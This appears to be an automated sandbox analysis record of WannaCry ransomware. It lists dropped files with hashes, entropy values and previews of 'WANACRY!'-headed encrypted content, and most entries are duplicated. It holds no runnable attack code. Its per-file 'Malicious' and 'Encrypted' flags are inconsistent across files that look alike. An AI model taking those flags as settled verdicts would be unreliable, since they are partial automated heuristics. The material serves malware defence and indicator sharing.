                                                                              Preview:WANACRY!.....B.4.....o....+j...tk.SZ.<Z.....d..w.TM..~.........5i..|.....+..q1.....@.<S7..2..#.k.....T..".(20,..9..f....TC..E...O.3.o.8A./.y.g|..GA.6.x.I0.?[...R.g..J.L.4.%.cm....%@..m+.....,..o-..../.>ou1...(s{.\T.a$...:.kt;va.r}O..U.....G....9.<...Q2CI.9...................BO..$...`.FN..~^6...%^e..@.c....r....wN+..n4...\?R....p.....^.o.........T......a...Q..a.........:.w<.'......c...F9.......F.......+h.B...O..., ....#.C...n,...o...{q.i..'}~#%>=..\..>.rz. _..^...Ic"....eo..|...D]..kPo.?.}p.2....m.)...[EHu7.6.Nat.._G.XK.. ...K1.....{.C.c3%}.u..\(..."...|(..'J..B..C#0....<\.&.}..J.,..@.t.z.}.H.II.3...o.....08.tN,..L.c;...vP...$..&.....Z.pj..~xP......1..:....Ck8j. ...w..*.wx......k!....[.L.\WG........~.O^BR.-..0.S"..c.....L.%N.c..../.<......./.,....VS......U[>..........9.....~....-.>......I."..6.7......6EP..k;f..HI../....4.T.F.x...d.W}.@...0...N.7..3k.j..A.U.*3...!...]./<A...$......St..O..U.JE;x.^7.q.\.K.].w.=.H4h.X~Y..C....8........}d...E
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1512
                                                                              Entropy (8bit):7.8572909198356164
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkusPi/IWPiM+FgKTpefH/a34PTQwy+bglMljs5RaiRxs0ukkd4Z3XPW:bkuWig0z2h8Pi3ocdXlkjKRah5HKu
                                                                              MD5:31F82EAD59925948B4E9A794931D82A1
                                                                              SHA1:72F24957CFA33EACCC049ED2C1CDB32FF9D5CC22
                                                                              SHA-256:6AF5D1CE1E56BC44E0E050F5A74518B49810315045A59908B50D5116DCA5A55E
                                                                              SHA-512:5C4E0A5E6C9767C31E93D047500FDA777B7DAD411AF7352814CEF32A13B3C497B3D5209CECBF111E2EE41DE94C212FB23ADC1A6B3D3FD596BB88E8CBC48D5FF7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....B.4.....o....+j...tk.SZ.<Z.....d..w.TM..~.........5i..|.....+..q1.....@.<S7..2..#.k.....T..".(20,..9..f....TC..E...O.3.o.8A./.y.g|..GA.6.x.I0.?[...R.g..J.L.4.%.cm....%@..m+.....,..o-..../.>ou1...(s{.\T.a$...:.kt;va.r}O..U.....G....9.<...Q2CI.9...................BO..$...`.FN..~^6...%^e..@.c....r....wN+..n4...\?R....p.....^.o.........T......a...Q..a.........:.w<.'......c...F9.......F.......+h.B...O..., ....#.C...n,...o...{q.i..'}~#%>=..\..>.rz. _..^...Ic"....eo..|...D]..kPo.?.}p.2....m.)...[EHu7.6.Nat.._G.XK.. ...K1.....{.C.c3%}.u..\(..."...|(..'J..B..C#0....<\.&.}..J.,..@.t.z.}.H.II.3...o.....08.tN,..L.c;...vP...$..&.....Z.pj..~xP......1..:....Ck8j. ...w..*.wx......k!....[.L.\WG........~.O^BR.-..0.S"..c.....L.%N.c..../.<......./.,....VS......U[>..........9.....~....-.>......I."..6.7......6EP..k;f..HI../....4.T.F.x...d.W}.@...0...N.7..3k.j..A.U.*3...!...]./<A...$......St..O..U.JE;x.^7.q.\.K.].w.=.H4h.X~Y..C....8........}d...E
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):7.8841456700748225
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkY7ygDJgCbqBn9SgY8OcP27KdoftSsTZAJYlRWmCy:o1YiCuFUg7OcePFvZlRWG
                                                                              MD5:961DBD0AC36E82C3FEEFD3D3FF3C7FAC
                                                                              SHA1:0E16987395A4CCCE575E5563D42E796EDC119E8B
                                                                              SHA-256:88936A5776CB6D9528663E103F4107E039B1A1BAE34F0590BDA0EDED4B076FFC
                                                                              SHA-512:2CD7D440DD53EF5A053864BFBE80F73C4C00D69C930E43CA1FF393DA85FF4B4F809D276EE42F275F1BC3E598FA12338714981010F6501921B61D094F9F705E19
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../\K.A..m..\...n....Q..1?...Q..R.....o.. t<.S.....}0...^..`.G6.E.R.g..kV..:.>..}.._n.#+.]/.J,%..... .._i....^.fd[x_.b.t.z...[t[.....9r.....n..X.4[O...qW|6|...U.&...5..L(...mh.@\*.....gG.Q...&....X.J....A@.fNR.d..)........H..99.)...>.3..1....O.............."....^.........X:...s. .8(..#..=l......./j.N...*...&...;`.ST....|C.Bv..DQ{./..m...)f... ...........s..i.%H..x....r.O....OC`..A.K.g.v..u;....<Q1.!.c..L.......`...o..V..|."A.........Ms.....D.Y...r:.......]..7....>.a..3{..k".2E.#.......~ES.. .oU..Mw....#.1..y"X6....!>.G..m...{#...V...@4q!. UEjO).[T.........[q::}..s.,.D2....o8..12'...9A..+R-,IK. F.i...!..Lc................*A.9......+.S./.b.......#$O......X.U...~f...L.,..~...W.{+....Z.Yl.&.f.m.:.N.z.Uxy.sh..r..^2..N..v.x&.p.r2Y.>..FJ?..2.j.0..~S.F...#m..wp`.. ......5.."."....Z....BA...NI&..z m.m.s^.1.#e..3......CS>4.v............r.?........J.......=.......wRw..X...@e.[...#V*.....R.A%bpJB.f..2.....2.b.NFNuj.:...u...}..."..8".
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1752
                                                                              Entropy (8bit):7.8841456700748225
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkY7ygDJgCbqBn9SgY8OcP27KdoftSsTZAJYlRWmCy:o1YiCuFUg7OcePFvZlRWG
                                                                              MD5:961DBD0AC36E82C3FEEFD3D3FF3C7FAC
                                                                              SHA1:0E16987395A4CCCE575E5563D42E796EDC119E8B
                                                                              SHA-256:88936A5776CB6D9528663E103F4107E039B1A1BAE34F0590BDA0EDED4B076FFC
                                                                              SHA-512:2CD7D440DD53EF5A053864BFBE80F73C4C00D69C930E43CA1FF393DA85FF4B4F809D276EE42F275F1BC3E598FA12338714981010F6501921B61D094F9F705E19
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../\K.A..m..\...n....Q..1?...Q..R.....o.. t<.S.....}0...^..`.G6.E.R.g..kV..:.>..}.._n.#+.]/.J,%..... .._i....^.fd[x_.b.t.z...[t[.....9r.....n..X.4[O...qW|6|...U.&...5..L(...mh.@\*.....gG.Q...&....X.J....A@.fNR.d..)........H..99.)...>.3..1....O.............."....^.........X:...s. .8(..#..=l......./j.N...*...&...;`.ST....|C.Bv..DQ{./..m...)f... ...........s..i.%H..x....r.O....OC`..A.K.g.v..u;....<Q1.!.c..L.......`...o..V..|."A.........Ms.....D.Y...r:.......]..7....>.a..3{..k".2E.#.......~ES.. .oU..Mw....#.1..y"X6....!>.G..m...{#...V...@4q!. UEjO).[T.........[q::}..s.,.D2....o8..12'...9A..+R-,IK. F.i...!..Lc................*A.9......+.S./.b.......#$O......X.U...~f...L.,..~...W.{+....Z.Yl.&.f.m.:.N.z.Uxy.sh..r..^2..N..v.x&.p.r2Y.>..FJ?..2.j.0..~S.F...#m..wp`.. ......5.."."....Z....BA...NI&..z m.m.s^.1.#e..3......CS>4.v............r.?........J.......=.......wRw..X...@e.[...#V*.....R.A%bpJB.f..2.....2.b.NFNuj.:...u...}..."..8".
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):28952
                                                                              Entropy (8bit):7.993506882587883
                                                                              Encrypted:true
                                                                              SSDEEP:768:/rWglzDdfRfMVEIEn819nexc5dEOEBGjcLBAY41l:/y+zDhdqZZnexadBEAsAF
                                                                              MD5:B0CBB7D883D7FC2FF39BDFB8A91214B8
                                                                              SHA1:4D5C9F6EDFBEE2731D8C39686240339667A95687
                                                                              SHA-256:7B67F1A7108C909027D27DC633F7D5B6E3CAB0C68251E89ADCC71E0B1032C2C3
                                                                              SHA-512:89B673B35193F357FCD2127358B6E5994622A1F8D90C6182DF1E3E67AEBB0B08B0B142B32A5BD66A47EF2A2890A0F52F8AD2C83E87D34CBD5539A116C28D566A
                                                                              Malicious:true
                                                                              Preview:WANACRY!...........B.y.^c.-R.."...F"xg6>.^w.bNhB s.......(..'.G...KF..~.G<...Pz..._.#.....l....i.#i7.b..i.Z.^....`g.z.D....;.V.P...l....i....7\..V..X....y(.~%V..{.zu.......o.H.`.u...)Nki.C..`......W."..$..=.....K.S....Z...6..6i.+......L.R...(u.. "....f.A.p.U.....p........hV..#...TK.....3z:.IR.L..-.z.....R...Q:....qQ.d.t....Yl.7....b..'..f..Mx|....R..h.........T..?.(.a#....AM,..SG>..tS.+......}.)......D.....t..1T.......j...&...x....*.m|.R-Z.Wu.R..J.oJ.]oL_.......F.CM.g1....q5..&:....n..9../5M..u~......T.....}g..8..&Q.*.A...n.%..)TY16ml..}...;...W..e..@...*.?..I.F...+..>......4%..IGWA<.w.rq.C..u(.u..81.eq..d.t.L.{..^..Q,M..S.....Q..c$.........c.06%a.....c..#.C....]R..=.9..!...%#.h,..?.\..lw..we..V^.UySw.Z.I.qc.........2|..i...6~...nD8..s3.4....iyL....q@.O..s.... @.c..Fl......uzQ.8...:........3.!<...7K&..].d....,<.4...|....~r...=W.q..)....mw......v..N:N.9.{f}.....?...6%.......#.....,/:.?.?.<.;....`.%....2....<)>d6.uQ."...H.E=.:...2.5U.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):28952
                                                                              Entropy (8bit):7.993506882587883
                                                                              Encrypted:true
                                                                              SSDEEP:768:/rWglzDdfRfMVEIEn819nexc5dEOEBGjcLBAY41l:/y+zDhdqZZnexadBEAsAF
                                                                              MD5:B0CBB7D883D7FC2FF39BDFB8A91214B8
                                                                              SHA1:4D5C9F6EDFBEE2731D8C39686240339667A95687
                                                                              SHA-256:7B67F1A7108C909027D27DC633F7D5B6E3CAB0C68251E89ADCC71E0B1032C2C3
                                                                              SHA-512:89B673B35193F357FCD2127358B6E5994622A1F8D90C6182DF1E3E67AEBB0B08B0B142B32A5BD66A47EF2A2890A0F52F8AD2C83E87D34CBD5539A116C28D566A
                                                                              Malicious:true
                                                                              Preview:WANACRY!...........B.y.^c.-R.."...F"xg6>.^w.bNhB s.......(..'.G...KF..~.G<...Pz..._.#.....l....i.#i7.b..i.Z.^....`g.z.D....;.V.P...l....i....7\..V..X....y(.~%V..{.zu.......o.H.`.u...)Nki.C..`......W."..$..=.....K.S....Z...6..6i.+......L.R...(u.. "....f.A.p.U.....p........hV..#...TK.....3z:.IR.L..-.z.....R...Q:....qQ.d.t....Yl.7....b..'..f..Mx|....R..h.........T..?.(.a#....AM,..SG>..tS.+......}.)......D.....t..1T.......j...&...x....*.m|.R-Z.Wu.R..J.oJ.]oL_.......F.CM.g1....q5..&:....n..9../5M..u~......T.....}g..8..&Q.*.A...n.%..)TY16ml..}...;...W..e..@...*.?..I.F...+..>......4%..IGWA<.w.rq.C..u(.u..81.eq..d.t.L.{..^..Q,M..S.....Q..c$.........c.06%a.....c..#.C....]R..=.9..!...%#.h,..?.\..lw..we..V^.UySw.Z.I.qc.........2|..i...6~...nD8..s3.4....iyL....q@.O..s.... @.c..Fl......uzQ.8...:........3.!<...7K&..].d....,<.4...|....~r...=W.q..)....mw......v..N:N.9.{f}.....?...6%.......#.....,/:.?.?.<.;....`.%....2....<)>d6.uQ."...H.E=.:...2.5U.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.987315760281926
                                                                              Encrypted:false
                                                                              SSDEEP:384:texy7SXe64vk5ca9hxcQZLrD2oM54DMSMwQ4PpjA:t2GSXe6YsD9MGfSoM54DfQipjA
                                                                              MD5:EB092AAAB053C2F64AD808F26B6723D4
                                                                              SHA1:56F87F5D7E87D00CC9BBE4263EDDFA2676C0AB39
                                                                              SHA-256:D77D207E07754B4B80E85DE09B1B9EB12CE46D814FE5FFF79D22AF8CC279D453
                                                                              SHA-512:E8F1F8C95BD2C4CACE9CD56A9A2AA661BD122B21EC4E6B7C28F4E63CC03C7E208ACABC7FAC6DA090116D7E0CEECF18D96AE4F0E269E9A086DC06FFAB0AF7C26C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......Z..:g...Y.%.J.....VJe.E....b........#...P..g.r\..../.+u..C...i ..kg..{.;....no.k..T.3."<.....Y.4......g..........7...E.......bQ.}}04.}s..9..........9.;....i]...9>.c.m:.V)M..N.N~..=}jR.O..ko..c..../..9.3.=S.<........L.;...S..0.W..ya...1.9....M......@......{*..i.....@.?....=m.t.h.'.z.]..NT..>..!?.}...G.p..`..>..!=.Hm...........V@2@.f.Fd..s.h..[.].>c...l..%.}.]*..>.=...O..!A<.....<j6}"....f...Dl...{.!\?.B.ha.y.&..3......bkg..e{rT...&..5..R.&.P.7>...cG.L]B..a...J.BM..p.{..v].......u.......V_.J.`Ad..A..... ......&..U..8....l.C..pB.[......#.......9i..k....\%.60..p^L.$.K....<r.4...S..|..V.....K=....@..xn..P......\P..f.Y...=+.J..iLc.l;... .Z.....Sm...<........!/:$.l..{.$.h.._...b.....\_....c1.....,...2S.0o.C...P.....0....&vtS....C..Rt.4....s...Y.Of..4.I...... 9.......$.c..i.t../..v7 ...9...7%n...25..=)-.Y.......Y..sAU..e3$..?.V.}.H.).n..H-e..5~..%w.T.y..0(I.<].....@7z.,......n.a.......ZV.r..-...0.I.....Bx7.].Z.Z..&..../...>4,.%E...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.987315760281926
                                                                              Encrypted:false
                                                                              SSDEEP:384:texy7SXe64vk5ca9hxcQZLrD2oM54DMSMwQ4PpjA:t2GSXe6YsD9MGfSoM54DfQipjA
                                                                              MD5:EB092AAAB053C2F64AD808F26B6723D4
                                                                              SHA1:56F87F5D7E87D00CC9BBE4263EDDFA2676C0AB39
                                                                              SHA-256:D77D207E07754B4B80E85DE09B1B9EB12CE46D814FE5FFF79D22AF8CC279D453
                                                                              SHA-512:E8F1F8C95BD2C4CACE9CD56A9A2AA661BD122B21EC4E6B7C28F4E63CC03C7E208ACABC7FAC6DA090116D7E0CEECF18D96AE4F0E269E9A086DC06FFAB0AF7C26C
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......Z..:g...Y.%.J.....VJe.E....b........#...P..g.r\..../.+u..C...i ..kg..{.;....no.k..T.3."<.....Y.4......g..........7...E.......bQ.}}04.}s..9..........9.;....i]...9>.c.m:.V)M..N.N~..=}jR.O..ko..c..../..9.3.=S.<........L.;...S..0.W..ya...1.9....M......@......{*..i.....@.?....=m.t.h.'.z.]..NT..>..!?.}...G.p..`..>..!=.Hm...........V@2@.f.Fd..s.h..[.].>c...l..%.}.]*..>.=...O..!A<.....<j6}"....f...Dl...{.!\?.B.ha.y.&..3......bkg..e{rT...&..5..R.&.P.7>...cG.L]B..a...J.BM..p.{..v].......u.......V_.J.`Ad..A..... ......&..U..8....l.C..pB.[......#.......9i..k....\%.60..p^L.$.K....<r.4...S..|..V.....K=....@..xn..P......\P..f.Y...=+.J..iLc.l;... .Z.....Sm...<........!/:$.l..{.$.h.._...b.....\_....c1.....,...2S.0o.C...P.....0....&vtS....C..Rt.4....s...Y.Of..4.I...... 9.......$.c..i.t../..v7 ...9...7%n...25..=)-.Y.......Y..sAU..e3$..?.V.}.H.).n..H-e..5~..%w.T.y..0(I.<].....@7z.,......n.a.......ZV.r..-...0.I.....Bx7.].Z.Z..&..../...>4,.%E...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):49432
                                                                              Entropy (8bit):7.996278982083159
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gnIu2gwloznQ/lnZxTypwidPx7Q7IM4NeK7:0kgcoznqlnZxT2dP+74t
                                                                              MD5:39B290D97D79674B71CC58830B0F6CBD
                                                                              SHA1:6F9B8BC0B9058B2243734E721480EF071E5061DF
                                                                              SHA-256:BB5BC59E2E4EB4DE228BEA53126CF97D94013DDB33B759AEAFDC6E61411D8DE0
                                                                              SHA-512:1DD6A4E85DF8FF02C70067D0346266E68749D64AC376AEE806935F7F53E3E8E428777DA197E5D3F1E7FFC61F9B4E1A99BAAFEE78087994E7F61FF10B73E732B1
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....>..Y....... .......9h.,<...pr.!....Bk...a.t....T>*...v..IIc........os9...C(...v-...Q./..i["<F.;D.....r...D!.I.....7o..0x......6'..QY.T.C..Oq@..x..mZ_.c#....D.}..?..uk.8.......8'.D[..P...x_.C.)+...)8xC..N.*....lmu.z............dy.I0S.....Q....6O............z>....$2|..&..e.dT.9.vj..+...._m.5.....7...T..'..Z..6..]a.V.j.f.z.F...8...=#.%..c...........-9\....F...g..lXH.w#5....Pr.........D`...;....e..r#.....U[EV..*.s/F..@L.......4.{Zt....A.wE.].Om.s..z+.#n....z...0.m..t...Lj..c....Tg.*.XjE....;.1...4.BU,..*/ ."2...-......#...G+....N...:qM..9....e.#.h!.m.f.Cj.....:19.yS.......C.....5.=z.T.p.b..6......W46.. ...<.7-./.R.98........J.A 6@...LASL(....y`...;...........dT.nqg....M.z.y..C7....\..|..~.<.$...\.m..Q"jl.rAP.......fM8.6.J.p..Jj.u..."..Je..Vk.M..Tq.\.Y\..4..-...7...D%s..s^.......j.Qt<../-]K]..8...&...s.'.... .j,........L+].......M..<..If......@.....d.?U....}..}.......1.N.]....l|.Q..NNo....{....'?+...BW....<...5..e.%. .i.....!.$.K...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):49432
                                                                              Entropy (8bit):7.996278982083159
                                                                              Encrypted:true
                                                                              SSDEEP:1536:gnIu2gwloznQ/lnZxTypwidPx7Q7IM4NeK7:0kgcoznqlnZxT2dP+74t
                                                                              MD5:39B290D97D79674B71CC58830B0F6CBD
                                                                              SHA1:6F9B8BC0B9058B2243734E721480EF071E5061DF
                                                                              SHA-256:BB5BC59E2E4EB4DE228BEA53126CF97D94013DDB33B759AEAFDC6E61411D8DE0
                                                                              SHA-512:1DD6A4E85DF8FF02C70067D0346266E68749D64AC376AEE806935F7F53E3E8E428777DA197E5D3F1E7FFC61F9B4E1A99BAAFEE78087994E7F61FF10B73E732B1
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....>..Y....... .......9h.,<...pr.!....Bk...a.t....T>*...v..IIc........os9...C(...v-...Q./..i["<F.;D.....r...D!.I.....7o..0x......6'..QY.T.C..Oq@..x..mZ_.c#....D.}..?..uk.8.......8'.D[..P...x_.C.)+...)8xC..N.*....lmu.z............dy.I0S.....Q....6O............z>....$2|..&..e.dT.9.vj..+...._m.5.....7...T..'..Z..6..]a.V.j.f.z.F...8...=#.%..c...........-9\....F...g..lXH.w#5....Pr.........D`...;....e..r#.....U[EV..*.s/F..@L.......4.{Zt....A.wE.].Om.s..z+.#n....z...0.m..t...Lj..c....Tg.*.XjE....;.1...4.BU,..*/ ."2...-......#...G+....N...:qM..9....e.#.h!.m.f.Cj.....:19.yS.......C.....5.=z.T.p.b..6......W46.. ...<.7-./.R.98........J.A 6@...LASL(....y`...;...........dT.nqg....M.z.y..C7....\..|..~.<.$...\.m..Q"jl.rAP.......fM8.6.J.p..Jj.u..."..Je..Vk.M..Tq.\.Y\..4..-...7...D%s..s^.......j.Qt<../-]K]..8...&...s.'.... .j,........L+].......M..<..If......@.....d.?U....}..}.......1.N.]....l|.Q..NNo....{....'?+...BW....<...5..e.%. .i.....!.$.K...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11288
                                                                              Entropy (8bit):7.984590982417377
                                                                              Encrypted:false
                                                                              SSDEEP:192:jw7eo3TPxhqkGkXA1uGx+9PlbMLnWJ+I4KmxAWGnrx88UjsUo0UyUdWUg5kD:jwtDPxhqkGkw1vxU9bx+I4KmxZGnrGwp
                                                                              MD5:DBBB3368CBC78623A4F914462C542566
                                                                              SHA1:8E364ECAE9DFC818C29EEB23AA577815C849D0EE
                                                                              SHA-256:8257737130BAE81E515D9D54B5FE32C873603229B3415A39F02F664D89C154D3
                                                                              SHA-512:497C11248DE0C79D4C92D95B6F6BF430D66A69CBCD956FEDF41D7E57A77861BEAC0AF570BCA74400B776CD9B72F9B2624F8E8AF63D0A7559D1B29D90D78CE09D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....yVC.v4>.j.....u.LS...d`b...=dS........AA.l.. ...E.L.....#...t:./...=.!2.o.........Gm....C.......Sxk.,.d...."....V...7}..A..n]3j3....(.WV.q...V...7.5.SB...s..t..5o.0...t}@/.-.V.F.z../.7.f.j.`M.Ok..8ky.J..r=.P~p.....k|d...J...C...w..(.H~3.Jv..R*........*.......4.*...~O....e)t.....:.m...y..9..r......]wT.cU.....d.=H.J.<.7..n.R.Mf.g.7....S...q.D..NF\n.eC.....N..cL.4.z.._."..e..v.B.5`..6...f..1..#...Rs.2W.%&.=.!..Nv7...v.s.MP.;....J~....1..y.P\i........R.i....c.:....2...-Q.Ko....[.....A.._}...../......0.7]ua..T... ...}.....n.1.o{...h.|../..........F..a'..p.....x.N..*.. ...y.....8......z.Q=..K.}0......>......4.._.p.......2...t.K@N.L.El[..7...y+7s[{.>jd8.U.....>x...X%.3`.B.....m..~E..u..Y&.f.\.... ..I.....]..#.]....aJ.....4..h.;l..-H....U..fm..hi... .K.s.....c...6..k.`.....y.....z<..e%.f....'.........`C..L..%B.E.#.e.-.n..?.S........f..5..Aa ....P ./.O'A.X......N..TL.Pl...6..0.W).z.s,R.4...K...5$......m...#.Pa.r.E.\-.G......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):11288
                                                                              Entropy (8bit):7.984590982417377
                                                                              Encrypted:false
                                                                              SSDEEP:192:jw7eo3TPxhqkGkXA1uGx+9PlbMLnWJ+I4KmxAWGnrx88UjsUo0UyUdWUg5kD:jwtDPxhqkGkw1vxU9bx+I4KmxZGnrGwp
                                                                              MD5:DBBB3368CBC78623A4F914462C542566
                                                                              SHA1:8E364ECAE9DFC818C29EEB23AA577815C849D0EE
                                                                              SHA-256:8257737130BAE81E515D9D54B5FE32C873603229B3415A39F02F664D89C154D3
                                                                              SHA-512:497C11248DE0C79D4C92D95B6F6BF430D66A69CBCD956FEDF41D7E57A77861BEAC0AF570BCA74400B776CD9B72F9B2624F8E8AF63D0A7559D1B29D90D78CE09D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....yVC.v4>.j.....u.LS...d`b...=dS........AA.l.. ...E.L.....#...t:./...=.!2.o.........Gm....C.......Sxk.,.d...."....V...7}..A..n]3j3....(.WV.q...V...7.5.SB...s..t..5o.0...t}@/.-.V.F.z../.7.f.j.`M.Ok..8ky.J..r=.P~p.....k|d...J...C...w..(.H~3.Jv..R*........*.......4.*...~O....e)t.....:.m...y..9..r......]wT.cU.....d.=H.J.<.7..n.R.Mf.g.7....S...q.D..NF\n.eC.....N..cL.4.z.._."..e..v.B.5`..6...f..1..#...Rs.2W.%&.=.!..Nv7...v.s.MP.;....J~....1..y.P\i........R.i....c.:....2...-Q.Ko....[.....A.._}...../......0.7]ua..T... ...}.....n.1.o{...h.|../..........F..a'..p.....x.N..*.. ...y.....8......z.Q=..K.}0......>......4.._.p.......2...t.K@N.L.El[..7...y+7s[{.>jd8.U.....>x...X%.3`.B.....m..~E..u..Y&.f.\.... ..I.....]..#.]....aJ.....4..h.;l..-H....U..fm..hi... .K.s.....c...6..k.`.....y.....z<..e%.f....'.........`C..L..%B.E.#.e.-.n..?.S........f..5..Aa ....P ./.O'A.X......N..TL.Pl...6..0.W).z.s,R.4...K...5$......m...#.Pa.r.E.\-.G......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):33048
                                                                              Entropy (8bit):7.995557265014961
                                                                              Encrypted:true
                                                                              SSDEEP:768:9MzfkdDG1r9dQjx3mwWqNnEuSJe05WPNLeHvnfRUEYL/:9MwDG1r9CfWqsSPNLeHvfRNe/
                                                                              MD5:1EDA6519935CE618321598176F11DB04
                                                                              SHA1:E467B0409A50B108EE76EB8135D46C5DE498EBCB
                                                                              SHA-256:FC29B46157B8ADABA1AA142F264C650CA07BA42594FE00CF5964C6A607D51AED
                                                                              SHA-512:9840B20B1C5A7FA0071946522397CD88CCD90731A59FCCA62E0E67A1B00177255DB4C8D1C890A7C36E9BAE49CA8054AE9996480FD021DFB5254F2A33C77C1C44
                                                                              Malicious:true
                                                                              Preview:WANACRY!........ ...7.5....%.=..y....`kW.XYR..?.}.`O..:...f9.B.[.7h.f...rE4-....M@u9...g1...K...T.e3~e...%.vV.....c!.......t....Pu.... .p.e.....U..\..>....u..!....H.pN...$..Y....y.>.!..#RD.....`wRt.....,1O....9.=.gl[R...<.N.m.O......e.../[...$U.W..K ..................$P..`.k.....Uy.z.....).:.n.......W?.t.jV..Zj........*/Y..j.....GN...W.c}.......0..u....r..9...x.....r.}......f]..A%..4...y^MVy#.X#<..*.2}L.....%.._.W.]......N..ZHN.g..Z....\.C...9...y....0@..._..SvI..P.Wm.q.#.A{.yd.[..25....A.T`...`Y..["..^\...G........b..{(.:..p. S3.#.....X/.`...~....ntW..C.......)Lk4....,....&...l...G......e..=.1D.h.b.'..1....\.._.......M..Le.I.u....9......Jw=..r.fd...(w.=..^l'.b.KKBkus.../.$mZ.fS)...G.>r1.......Z.,7#M.t..$...M.v.[7.9u.AA8..}s.B..t..H.-r..&nk..A..R.....g.0.Y......\.l.)..vz...c ....4....=S.q...5#.0..m.......Gw.....V....^.....~A...7.7....&.).?*G.=.....3.^sc.._....9.......)..h..D^R.......,.g.m.e.......2B.b'#.<.^..X.m..\.\.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):33048
                                                                              Entropy (8bit):7.995557265014961
                                                                              Encrypted:true
                                                                              SSDEEP:768:9MzfkdDG1r9dQjx3mwWqNnEuSJe05WPNLeHvnfRUEYL/:9MwDG1r9CfWqsSPNLeHvfRNe/
                                                                              MD5:1EDA6519935CE618321598176F11DB04
                                                                              SHA1:E467B0409A50B108EE76EB8135D46C5DE498EBCB
                                                                              SHA-256:FC29B46157B8ADABA1AA142F264C650CA07BA42594FE00CF5964C6A607D51AED
                                                                              SHA-512:9840B20B1C5A7FA0071946522397CD88CCD90731A59FCCA62E0E67A1B00177255DB4C8D1C890A7C36E9BAE49CA8054AE9996480FD021DFB5254F2A33C77C1C44
                                                                              Malicious:true
                                                                              Preview:WANACRY!........ ...7.5....%.=..y....`kW.XYR..?.}.`O..:...f9.B.[.7h.f...rE4-....M@u9...g1...K...T.e3~e...%.vV.....c!.......t....Pu.... .p.e.....U..\..>....u..!....H.pN...$..Y....y.>.!..#RD.....`wRt.....,1O....9.=.gl[R...<.N.m.O......e.../[...$U.W..K ..................$P..`.k.....Uy.z.....).:.n.......W?.t.jV..Zj........*/Y..j.....GN...W.c}.......0..u....r..9...x.....r.}......f]..A%..4...y^MVy#.X#<..*.2}L.....%.._.W.]......N..ZHN.g..Z....\.C...9...y....0@..._..SvI..P.Wm.q.#.A{.yd.[..25....A.T`...`Y..["..^\...G........b..{(.:..p. S3.#.....X/.`...~....ntW..C.......)Lk4....,....&...l...G......e..=.1D.h.b.'..1....\.._.......M..Le.I.u....9......Jw=..r.fd...(w.=..^l'.b.KKBkus.../.$mZ.fS)...G.>r1.......Z.,7#M.t..$...M.v.[7.9u.AA8..}s.B..t..H.-r..&nk..A..R.....g.0.Y......\.l.)..vz...c ....4....=S.q...5#.0..m.......Gw.....V....^.....~A...7.7....&.).?*G.=.....3.^sc.._....9.......)..h..D^R.......,.g.m.e.......2B.b'#.<.^..X.m..\.\.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20760
                                                                              Entropy (8bit):7.991474063378844
                                                                              Encrypted:true
                                                                              SSDEEP:384:g000M+hSNzTt5d9GsthORSr29UZ4yc4SqEjIERqZQTJZPIkvjLGA7IsiKuAI8:A0MGeCsrORSKTWEE0ukvjLGci+I8
                                                                              MD5:65437E6F26A4F9AD36A8D47FFCEC8406
                                                                              SHA1:DDD8F7C7589699698925C25855668A5916B5DE77
                                                                              SHA-256:81454DEE8F01D923DFCA114C2F03B220CC52392E5E8D0A8D7B9F1C14BCFB88B3
                                                                              SHA-512:E809A542BF16431A04EE09CA8D20A0D65BF77E17F37E84B333B898721A97D6AA8682575655EAE03B734930FD25E49B3BAC1E055F54659E6A29DB5EF0D613BD33
                                                                              Malicious:true
